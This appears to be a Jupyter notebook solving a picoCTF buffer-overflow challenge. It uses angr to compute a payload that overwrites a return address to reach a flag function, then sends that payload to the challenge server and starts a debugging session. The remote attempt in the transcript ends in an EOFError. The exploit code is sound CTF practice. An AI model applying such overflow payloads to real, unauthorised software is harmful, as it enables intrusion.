In [163]:
from pwn import *
import angr, monkeyhex, claripy
context(arch='x86', os='linux')

In [245]:
p = angr.Project('./vuln', auto_load_libs=False)
flag_func_addr = p.loader.main_object.get_symbol('flag').rebased_addr

In [369]:
p.factory.block(flag_func_addr).pp()

        flag:
401236  endbr64 
40123a  push    rbp
40123b  mov     rbp, rsp
40123e  sub     rsp, 0x50
401242  lea     rsi, [0x402008]
401249  lea     rdi, [0x40200a]
401250  call    fopen


In [370]:
#gonna manually set it to this because we are having some weird issues going to 0x401236
flag_func_addr = 0x40123a

In [371]:
p.loader.main_object.get_symbol('vuln').rebased_addr

0x4012b2

In [372]:
simgr = p.factory.simgr(p.factory.entry_state(add_options={angr.options.MEMORY_SYMBOLIC_BYTES_MAP, angr.options.REVERSE_MEMORY_HASH_MAP, angr.options.REVERSE_MEMORY_NAME_MAP}))
simgr.explore(find=0x4012b2) #get to the vuln function

#at this point, we are at the beginning of the function, so we should take note of the value of RSP because thats what we want to overwrite
found = simgr.found[0]
vuln_return_address = found.solver.eval(found.regs.rsp)
found.memory.load(vuln_return_address, 8)

symbolic_vars = []

#now we want to handle the gets call

class gets(angr.SimProcedure):
    def run(self, dst):
        print(dst)
        #taking the difference in address between dst and vuln_return_address, to give us how long our input should be
        length = (vuln_return_address - dst.to_claripy().args[0] + 8) * 8 #plus 8 cuz we want to overwrite the vuln_return_address value
        print(f'length is {length}')
        #now gonna create a bitvector of that size 
        gets_value = claripy.BVS('getsvalue', length, explicit_name=True)
        symbolic_vars.append(gets_value)
        print(gets_value)
        self.state.memory.store(dst, gets_value)
        print(self.state.memory.load(vuln_return_address, 8))
        print(claripy.BVV(flag_func_addr, 64).reversed)
        self.state.add_constraints(self.state.memory.load(vuln_return_address, 8) == claripy.BVV(flag_func_addr, 64).reversed)
        return dst
        
p.hook_symbol('gets', gets())



WARNING | 2022-03-18 11:02:57,897 | angr.storage.memory_mixins.default_filler_mixin | Filling memory at 0x7fffffffffeff9c with 4 unconstrained bytes referenced from 0x401159 (_start+0x9 in vuln (0x401159))
WARNING | 2022-03-18 11:02:58,191 | angr.project | Address is already hooked, during hook(0x500030, <SimProcedure gets>). Re-hooking.


0x500030

In [373]:
#now we are going to step the vuln function once so the gets simproc runs
simgr.step(stash='found', n=3)

<SAO <BV64 0x7fffffffffeff00>>
length is 640
<BV640 getsvalue>
<BV64 getsvalue[63:0]>
<BV64 0x3a12400000000000>


<SimulationManager with 1 found>

In [374]:
payload = simgr.found[0].solver.eval(symbolic_vars[0], cast_to=bytes)
payload

b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00:\x12@\x00\x00\x00\x00\x00'

In [375]:
io = remote("saturn.picoctf.net", 60992)
io.clean()
io.sendline(payload)
io.clean()

[x] Opening connection to saturn.picoctf.net on port 60992


INFO    | 2022-03-18 11:03:03,798 | pwnlib.tubes.remote.remote.139768182354800 | Opening connection to saturn.picoctf.net on port 60992


[x] Opening connection to saturn.picoctf.net on port 60992: Trying 18.217.86.78


INFO    | 2022-03-18 11:03:03,800 | pwnlib.tubes.remote.remote.139768182354800 | Opening connection to saturn.picoctf.net on port 60992: Trying 18.217.86.78


[+] Opening connection to saturn.picoctf.net on port 60992: Done


INFO    | 2022-03-18 11:03:03,818 | pwnlib.tubes.remote.remote.139768182354800 | Opening connection to saturn.picoctf.net on port 60992: Done


b''

[*] Closed connection to saturn.picoctf.net port 60992


INFO    | 2022-03-18 11:03:15,672 | pwnlib.tubes.remote.remote.139768182354800 | Closed connection to saturn.picoctf.net port 60992


EOFError: 

In [388]:
r = gdb.debug('./vuln', '''
break vuln
c
''')

[x] Starting local process '/usr/bin/gdbserver'


INFO    | 2022-03-18 11:08:01,774 | pwnlib.tubes.process.process.139768178999360 | Starting local process '/usr/bin/gdbserver'


[+] Starting local process '/usr/bin/gdbserver': pid 354868


INFO    | 2022-03-18 11:08:01,796 | pwnlib.tubes.process.process.139768178999360 | Starting local process '/usr/bin/gdbserver': pid 354868
DEBUG   | 2022-03-18 11:08:01,803 | pwnlib.gdb | Wrote gdb script to '/tmp/pwn7v1dw9o4.gdb'
target remote 127.0.0.1:45225

break vuln
c



[*] running in new terminal: ['/usr/bin/gdb', '-q', './vuln', '-x', '/tmp/pwn7v1dw9o4.gdb']


INFO    | 2022-03-18 11:08:01,804 | pwnlib.gdb | running in new terminal: ['/usr/bin/gdb', '-q', './vuln', '-x', '/tmp/pwn7v1dw9o4.gdb']
DEBUG   | 2022-03-18 11:08:01,805 | pwnlib.util.misc | Created script for new terminal:
#!/home/bork/.virtualenvs/pwntools/bin/python
import os
os.execve('/usr/bin/gdb', ['/usr/bin/gdb', '-q', './vuln', '-x', '/tmp/pwn7v1dw9o4.gdb'], os.environ)

DEBUG   | 2022-03-18 11:08:01,807 | pwnlib.util.misc | Launching a new terminal: ['/usr/bin/x-terminal-emulator', '-e', '/tmp/tmp58ranxc_']


In [386]:
r.clean()

b'Welcome to 64-bit. Give me a string that gets you the flag: \n'

In [389]:
r.sendline(payload)